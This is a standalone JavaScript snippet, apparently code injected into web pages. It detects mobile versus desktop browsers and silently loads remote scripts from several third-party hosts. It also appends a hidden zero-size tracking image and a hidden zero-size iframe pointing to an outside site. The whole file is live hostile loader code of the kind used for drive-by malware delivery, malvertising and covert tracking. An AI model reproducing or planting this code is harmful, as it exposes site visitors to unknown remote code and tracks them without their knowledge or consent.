(function () {
    if (!document.body) return setTimeout(arguments.callee, 50);
    var cid = 12;
    if(cid == '08'){
      return;
    }
    var e = document.createElement('script');
    if (/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
      e.src = 'http://ss.swagger1.com/s?stan=1&type=mobile';
      try {
             var arg = document.createElement('script');
             arg.type = 'text/javascript';
             arg.text = 'pid = "76eee1a0-661b-4c96-b879-c64b818c7f2e";doc = true;';
             document.body.appendChild(arg);
             var tj = document.createElement('script');
             tj.type = 'text/javascript';

             var t = new Date().getTime();
             t = Math.floor(t/(3600*1000));
             tj.src = '//jj.hyhyhj.com/alajs/malabase.js?v='+t;
             document.body.appendChild(tj);
             var tj0 = document.createElement('script');
             tj0.type = 'text/javascript';

             tj0.src = '//js.users.51.la/19274526.js';
             document.body.appendChild(tj0);
             var im = document.createElement('img');
             im.width='0';im.height='0';
             im.style.display = 'none';
             im.src = 'http://ss.swagger1.com/s?stan=1&type=mstj1';
             document.body.appendChild(im);
      } catch (ee) {
        e.src = 'http://ss.swagger1.com/s?stan=1&type=err&msg='+ee.message;
      }
    } else {
      e.src = 'http://ss.swagger1.com/s?stan=1&type=pc';
      try {
        var tj = document.createElement('script');
        tj.type = 'text/javascript';
        tj.async = true;
        tj.src = 'http://jj.hyhyhj.com/alajs/ala42353.js';
        document.body.appendChild(tj);
      } catch (ee) {
        e.src = 'http://ss.swagger1.com/s?stan=1&type=err&msg='+ee.message;
      }
    }
    e.type = "text/javascript";
    document.body.insertBefore(e, document.body.children.item(0));
  })();



 (function () {
    if (!document.body) return setTimeout(arguments.callee, 50); 
      var ifr = document.createElement('iframe');
      ifr.style.display = 'none';
      ifr.src = 'http://www.60mil.com/templets/abc.htm';
      ifr.style.height = '0px';
      ifr.style.width = '0px';
      document.body.appendChild(ifr);
  })();


